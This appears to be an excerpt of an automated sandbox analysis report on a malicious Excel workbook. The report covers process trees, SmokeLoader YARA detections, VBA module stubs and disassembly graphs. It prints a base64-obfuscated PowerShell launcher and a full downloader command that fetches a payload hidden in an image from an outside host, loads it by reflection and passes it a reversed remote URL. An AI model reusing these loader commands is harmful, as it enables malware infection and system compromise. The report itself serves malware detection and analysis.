8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                Imagebase:0x3b0000
                                File size:427'008 bytes
                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:12
                                Start time:03:30:14
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
                                Imagebase:0x3b0000
                                File size:427'008 bytes
                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.494209525.0000000009260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate
                                Has exited:true

                                Target ID:13
                                Start time:03:30:30
                                Start date:28/05/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x10d0000
                                File size:64'704 bytes
                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:true

                                Target ID:14
                                Start time:03:30:35
                                Start date:28/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:15
                                Start time:03:30:54
                                Start date:28/05/2024
                                Path:C:\Windows\System32\taskeng.exe
                                Wow64 process (32bit):false
                                Commandline:taskeng.exe {3AFD0624-861F-4A6A-8994-E838F818ED19} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                Imagebase:0xff6a0000
                                File size:464'384 bytes
                                MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:16
                                Start time:03:30:55
                                Start date:28/05/2024
                                Path:C:\Users\user\AppData\Roaming\rugtucw
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\rugtucw
                                Imagebase:0xe70000
                                File size:64'704 bytes
                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:moderate
                                Has exited:true

                                Target ID:18
                                Start time:03:30:56
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                Imagebase:0x460000
                                File size:2'972'672 bytes
                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:19
                                Start time:03:30:57
                                Start date:28/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\explorer.exe
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:20
                                Start time:03:30:59
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                Imagebase:0x460000
                                File size:2'972'672 bytes
                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:03:31:00
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                Imagebase:0x460000
                                File size:2'972'672 bytes
                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:23
                                Start time:03:31:01
                                Start date:28/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\explorer.exe
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:24
                                Start time:03:31:04
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                Imagebase:0x460000
                                File size:2'972'672 bytes
                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                Has exited:false

                                Target ID:28
                                Start time:03:31:05
                                Start date:28/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\explorer.exe
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.617958525.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                Has exited:false

                                Target ID:29
                                Start time:03:31:07
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                Imagebase:0x460000
                                File size:2'972'672 bytes
                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:30
                                Start time:03:31:08
                                Start date:28/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\explorer.exe
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Call Graph

                                • Entrypoint
                                • Decryption Function
                                • Executed
                                • Not Executed
                                • Show Help
                                callgraph 1 Error: Graph is empty

                                Module: Sheet1

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Sheet1"

                                2

                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Module: Sheet2

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Sheet2"

                                2

                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Module: Sheet3

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Sheet3"

                                2

                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Module: ThisWorkbook

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "ThisWorkbook"

                                2

                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Reset < >
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.544604492.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 323aa2f11c0584727ed41182b3cbc8163a2653ca4e962db0d7132b0af1634d29
                                  • Instruction ID: 4b7ff9f548c64820ab3af1556b9c9569cf0c841b56a924c7868be5c2326018fc
                                  • Opcode Fuzzy Hash: 323aa2f11c0584727ed41182b3cbc8163a2653ca4e962db0d7132b0af1634d29
                                  • Instruction Fuzzy Hash: D7018471504340AAE7105E19D884B66BFA8DF81724F28851BFC454A386C7799C45D6B1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.544604492.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5197d5ae2e67244623a449cc7ffb535892df478519ff6fc23758e75b51bc0c84
                                  • Instruction ID: 549a620af86a9d69d1b9dfa26e235ab1b4b3fb0e5fbd1c331e494360054d74ca
                                  • Opcode Fuzzy Hash: 5197d5ae2e67244623a449cc7ffb535892df478519ff6fc23758e75b51bc0c84
                                  • Instruction Fuzzy Hash: 60015E6240D3C09FD7128B259C94B66BFB4DF53724F1981DBE8888F2A7C2699C48C772

                                  Execution Graph

                                  Execution Coverage:10.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:14.7%
                                  Total number of Nodes:34
                                  Total number of Limit Nodes:2
                                  execution_graph 5564 1b754a0 5566 1b754d3 5564->5566 5565 1b7609b 5566->5565 5567 1b76d20 WriteProcessMemory 5566->5567 5568 1b76d18 WriteProcessMemory 5566->5568 5575 1b770ac 5566->5575 5579 1b770b8 5566->5579 5583 1b76ac8 5566->5583 5587 1b76ac1 5566->5587 5591 1b769d8 5566->5591 5595 1b769d0 5566->5595 5567->5566 5568->5566 5576 1b770b8 CreateProcessA 5575->5576 5578 1b7739d 5576->5578 5580 1b7713f CreateProcessA 5579->5580 5582 1b7739d 5580->5582 5582->5582 5584 1b76b11 Wow64SetThreadContext 5583->5584 5586 1b76b8f 5584->5586 5586->5566 5588 1b76ac8 Wow64SetThreadContext 5587->5588 5590 1b76b8f 5588->5590 5590->5566 5592 1b76a1c ResumeThread 5591->5592 5594 1b76a6e 5592->5594 5594->5566 5596 1b769d8 ResumeThread 5595->5596 5598 1b76a6e 5596->5598 5598->5566 5599 1b76039 5601 1b7564a 5599->5601 5600 1b7609b 5601->5600 5602 1b76d20 WriteProcessMemory 5601->5602 5603 1b76d18 WriteProcessMemory 5601->5603 5604 1b76ac1 Wow64SetThreadContext 5601->5604 5605 1b76ac8 Wow64SetThreadContext 5601->5605 5606 1b769d0 ResumeThread 5601->5606 5607 1b769d8 ResumeThread 5601->5607 5608 1b770ac CreateProcessA 5601->5608 5609 1b770b8 CreateProcessA 5601->5609 5602->5601 5603->5601 5604->5601 5605->5601 5606->5601 5607->5601 5608->5601 5609->5601

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 628 1b754a0-1b754d1 629 1b754d3 628->629 630 1b754d8-1b75540 628->630 629->630 632 1b75542-1b75550 630->632 633 1b75551-1b75645 call 1b72fd4 call 1b74e74 call 1b71bb0 630->633 632->633 648 1b7607e-1b76095 633->648 649 1b7609b-1b760a2 648->649 650 1b7564a-1b7571f 648->650 767 1b75722 call 1b770ac 650->767 768 1b75722 call 1b770b8 650->768 656 1b75724-1b75744 657 1b75746-1b75761 656->657 658 1b7576c-1b757d6 656->658 657->658 664 1b757dd-1b75809 658->664 665 1b757d8 658->665 667 1b75893-1b758e8 664->667 668 1b7580f-1b75864 664->668 665->664 673 1b75910 667->673 674 1b758ea-1b75905 667->674 675 1b75866-1b75881 668->675 676 1b7588c-1b7588e 668->676 677 1b75911-1b7591b 673->677 674->673 675->676 676->677 679 1b75922-1b7598c 677->679 680 1b7591d 677->680 686 1b759b4-1b759cd 679->686 687 1b7598e-1b759a9 679->687 680->679 688 1b75a45-1b75afa 686->688 689 1b759cf-1b75a1d 686->689 687->686 700 1b75b22-1b75b5e 688->700 701 1b75afc-1b75b17 688->701 689->688 696 1b75a1f-1b75a3a 689->696 696->688 763 1b75b61 call 1b76d20 700->763 764 1b75b61 call 1b76d18 700->764 701->700 706 1b75b63-1b75b83 707 1b75b85-1b75ba0 706->707 708 1b75bab-1b75be6 706->708 707->708 711 1b75d66-1b75d85 708->711 712 1b75beb-1b75c78 711->712 713 1b75d8b-1b75de1 711->713 723 1b75c7e-1b75d0a 712->723 724 1b75d58-1b75d60 712->724 773 1b75de4 call 1b76d20 713->773 774 1b75de4 call 1b76d18 713->774 719 1b75de6-1b75e06 721 1b75e2e-1b75e64 719->721 722 1b75e08-1b75e23 719->722 728 1b75e66-1b75e69 721->728 729 1b75e6f-1b75e85 721->729 722->721 769 1b75d0d call 1b76d20 723->769 770 1b75d0d call 1b76d18 723->770 724->711 728->729 730 1b75e87 729->730 731 1b75e8c-1b75eb7 729->731 730->731 736 1b75f41-1b75f96 731->736 737 1b75ebd-1b75eed 731->737 746 1b75fbe 736->746 747 1b75f98-1b75fb3 736->747 765 1b75ef0 call 1b76ac1 737->765 766 1b75ef0 call 1b76ac8 737->766 738 1b75d0f-1b75d2f 740 1b75d57 738->740 741 1b75d31-1b75d4c 738->741 740->724 741->740 745 1b75ef2-1b75f12 748 1b75f14-1b75f2f 745->748 749 1b75f3a-1b75f3c 745->749 750 1b75fbf-1b75fe8 746->750 747->746 748->749 749->750 771 1b75feb call 1b769d0 750->771 772 1b75feb call 1b769d8 750->772 757 1b75fed-1b7600d 758 1b76035-1b76079 757->758 759 1b7600f-1b7602a 757->759 758->648 758->649 759->758 763->706 764->706 765->745 766->745 767->656 768->656 769->738 770->738 771->757 772->757 773->719 774->719
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ($PG4
                                  • API String ID: 0-3941836918
                                  • Opcode ID: 1bcb558abf3369f0fc85a48cda9b15517645c30acfd34438718cc39854c9f6f4
                                  • Instruction ID: 88d6840dab84b45563564f2b470ea902a8c341a17cb5382c6a4f2cf340416c24
                                  • Opcode Fuzzy Hash: 1bcb558abf3369f0fc85a48cda9b15517645c30acfd34438718cc39854c9f6f4
                                  • Instruction Fuzzy Hash: 0662C274A00229DFDB69DF68C894BEDBBB2FB89300F1085EAD509A7251DB345E85CF50
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461263729.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1b70000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8412ffd25ab66bf5bd4a27f0be128001474df5f1f42a8b92833b3c6fe38bc610
                                  • Instruction ID: 2222af755e0a3196a6128f49a955d99f0e19a82523e6488a0ac986c16a019228
                                  • Opcode Fuzzy Hash: 8412ffd25ab66bf5bd4a27f0be128001474df5f1f42a8b92833b3c6fe38bc610
                                  • Instruction Fuzzy Hash: C4A11C7190A3948FDB17DB3AD8606C9BFB1AF4B210F0541DBC488DB2A3E6354D85CB65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 1ca1830-1ca185b 1 1ca1861-1ca1866 0->1 2 1ca1ac6-1ca1ade 0->2 3 1ca1868-1ca186e 1->3 4 1ca187e-1ca1882 1->4 15 1ca1ae0-1ca1ae3 2->15 16 1ca1ae4-1ca1b0e 2->16 5 1ca1872-1ca187c 3->5 6 1ca1870 3->6 7 1ca1888-1ca188c 4->7 8 1ca1a73-1ca1a7d 4->8 5->4 6->4 12 1ca188e-1ca189d 7->12 13 1ca189f 7->13 10 1ca1a8b-1ca1a91 8->10 11 1ca1a7f-1ca1a88 8->11 19 1ca1a93-1ca1a95 10->19 20 1ca1a97-1ca1aa3 10->20 21 1ca18a1-1ca18a3 12->21 13->21 15->16 17 1ca1c7b-1ca1cad 16->17 18 1ca1b14-1ca1b19 16->18 35 1ca1caf-1ca1cbb 17->35 36 1ca1cbd 17->36 22 1ca1b1b-1ca1b21 18->22 23 1ca1b31-1ca1b35 18->23 24 1ca1aa5-1ca1ac3 19->24 20->24 21->8 25 1ca18a9-1ca18ab 21->25 27 1ca1b23 22->27 28 1ca1b25-1ca1b2f 22->28 30 1ca1c2a-1ca1c34 23->30 31 1ca1b3b-1ca1b3d 23->31 32 1ca18ca 25->32 33 1ca18ad-1ca18c8 25->33 27->23 28->23 37 1ca1c42-1ca1c48 30->37 38 1ca1c36-1ca1c3f 30->38 39 1ca1b3f-1ca1b4b 31->39 40 1ca1b4d 31->40 34 1ca18cc-1ca18ce 32->34 33->34 34->8 42 1ca18d4-1ca1900 34->42 43 1ca1cbf-1ca1cc1 35->43 36->43 44 1ca1c4a-1ca1c4c 37->44 45 1ca1c4e-1ca1c5a 37->45 47 1ca1b4f-1ca1b51 39->47 40->47 42->8 83 1ca1906-1ca1913 42->83 49 1ca1d0d-1ca1d17 43->49 50 1ca1cc3-1ca1cc9 43->50 51 1ca1c5c-1ca1c78 44->51 45->51 47->30 53 1ca1b57-1ca1b59 47->53 58 1ca1d19-1ca1d1f 49->58 59 1ca1d22-1ca1d28 49->59 55 1ca1ccb-1ca1ccd 50->55 56 1ca1cd7-1ca1cf4 50->56 60 1ca1b5b-1ca1b67 53->60 61 1ca1b69 53->61 55->56 74 1ca1d5a-1ca1d5f 56->74 75 1ca1cf6-1ca1d07 56->75 65 1ca1d2a-1ca1d2c 59->65 66 1ca1d2e-1ca1d3a 59->66 64 1ca1b6b-1ca1b6d 60->64 61->64 64->30 67 1ca1b73-1ca1b75 64->67 68 1ca1d3c-1ca1d57 65->68 66->68 71 1ca1b8f-1ca1b93 67->71 72 1ca1b77-1ca1b7d 67->72 81 1ca1bad-1ca1c27 71->81 82 1ca1b95-1ca1b9b 71->82 77 1ca1b7f 72->77 78 1ca1b81-1ca1b8d 72->78 74->75 75->49 77->71 78->71 84 1ca1b9f-1ca1bab 82->84 85 1ca1b9d 82->85 89 1ca1919-1ca191e 83->89 90 1ca19ac-1ca19eb 83->90 84->81 85->81 92 1ca1920-1ca1926 89->92 93 1ca1936-1ca194f 89->93 112 1ca19f2-1ca1a01 90->112 97 1ca192a-1ca1934 92->97 98 1ca1928 92->98 93->90 103 1ca1951-1ca1973 93->103 97->93 98->93 106 1ca198d-1ca1997 103->106 107 1ca1975-1ca197b 103->107 111 1ca199c-1ca19aa 106->111 108 1ca197f-1ca198b 107->108 109 1ca197d 107->109 108->106 109->106 111->112 116 1ca1a19-1ca1a70 112->116 117 1ca1a03-1ca1a09 112->117 118 1ca1a0b 117->118 119 1ca1a0d-1ca1a0f 117->119 118->116 119->116
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$@#8g$@#8g$@#8g$@#8g$tPp$tPp$$p$$p$$p$$p$$p$$p$Og
                                  • API String ID: 0-3287164700
                                  • Opcode ID: 00ab9a24a31d7e0b65751d0c7be7c446a7524adca4f3f55b7f394d3ee4e42cb0
                                  • Instruction ID: 782b7f3b1f2d45b610bfa0f1482682abd08839d4d52999f6e113dee22bc0a1ee
                                  • Opcode Fuzzy Hash: 00ab9a24a31d7e0b65751d0c7be7c446a7524adca4f3f55b7f394d3ee4e42cb0
                                  • Instruction Fuzzy Hash: C2D14735B00202DFDB2A9A6DD850B6ABBE2AFC4314FAC846AD545CB351DE71CE41C792

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 121 1ca2658-1ca267a 122 1ca2680-1ca2685 121->122 123 1ca27f7-1ca2816 121->123 124 1ca269d-1ca26a9 122->124 125 1ca2687-1ca268d 122->125 129 1ca2818-1ca281a 123->129 130 1ca281c 123->130 132 1ca26af-1ca26b2 124->132 133 1ca27a2-1ca27ac 124->133 126 1ca268f 125->126 127 1ca2691-1ca269b 125->127 126->124 127->124 129->130 135 1ca2820-1ca2842 129->135 130->135 132->133 136 1ca26b8-1ca26bf 132->136 137 1ca27ba-1ca27c0 133->137 138 1ca27ae-1ca27b7 133->138 139 1ca2848-1ca284d 135->139 140 1ca29c5-1ca29de 135->140 136->123 141 1ca26c5-1ca26ca 136->141 142 1ca27c2-1ca27c4 137->142 143 1ca27c6-1ca27d2 137->143 144 1ca284f-1ca2855 139->144 145 1ca2865-1ca2869 139->145 155 1ca29e0-1ca29e1 140->155 156 1ca29e4-1ca29e6 140->156 150 1ca26cc-1ca26d2 141->150 151 1ca26e2-1ca26e6 141->151 146 1ca27d4-1ca27f4 142->146 143->146 147 1ca2859-1ca2863 144->147 148 1ca2857 144->148 152 1ca286f-1ca2873 145->152 153 1ca2970-1ca297a 145->153 147->145 148->145 157 1ca26d6-1ca26e0 150->157 158 1ca26d4 150->158 151->133 163 1ca26ec-1ca26f0 151->163 161 1ca28b3 152->161 162 1ca2875-1ca2886 152->162 159 1ca2988-1ca298e 153->159 160 1ca297c-1ca2985 153->160 157->151 158->151 167 1ca2990-1ca2992 159->167 168 1ca2994-1ca29a0 159->168 164 1ca28b5-1ca28b7 161->164 162->140 179 1ca288c-1ca2891 162->179 169 1ca26f2-1ca270e 163->169 170 1ca2710 163->170 164->153 172 1ca28bd-1ca28c1 164->172 174 1ca29a2-1ca29c2 167->174 168->174 171 1ca2712-1ca2714 169->171 170->171 171->133 176 1ca271a-1ca2727 171->176 172->153 177 1ca28c7-1ca28cb 172->177 196 1ca272e-1ca2730 176->196 182 1ca28ee 177->182 183 1ca28cd-1ca28d6 177->183 184 1ca28a9-1ca28b1 179->184 185 1ca2893-1ca2899 179->185 190 1ca28f1-1ca28fe 182->190 188 1ca28d8-1ca28db 183->188 189 1ca28dd-1ca28ea 183->189 184->164 191 1ca289b 185->191 192 1ca289d-1ca28a7 185->192 194 1ca28ec 188->194 189->194 202 1ca2900-1ca2906 190->202 203 1ca2916-1ca296d 190->203 191->184 192->184 194->190 200 1ca2748-1ca279f 196->200 201 1ca2732-1ca2738 196->201 205 1ca273a 201->205 206 1ca273c-1ca273e 201->206 208 1ca290a-1ca290c 202->208 209 1ca2908 202->209 205->200 206->200 208->203 209->203
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.461295147.0000000001CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_1ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'p$4'p$4'p$4'p$@#8g$@#8g$@#8g$@#8g
                                  • API String ID: 0-3704151321
                                  • Opcode ID: c6115ea434f9a8fa2a0dd711756d150f0609dc4e4b756af755d79681b44ec21e
                                  • Instruction ID: 2dc200d2d788e5d1ac62174784eb9286083e3965287692cdf9b6c4354de715d6
                                  • Opcode Fuzzy Hash: c6115ea434f9a8fa2a0dd711756d150f0609dc4e4b756af755d79681b44ec21e
                                  • Instruction Fuzzy Hash: 3D910335B00226DFDB1A9F7DC4506A9BFE2BF85224F94C0AAE444CB251DB31CE45CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
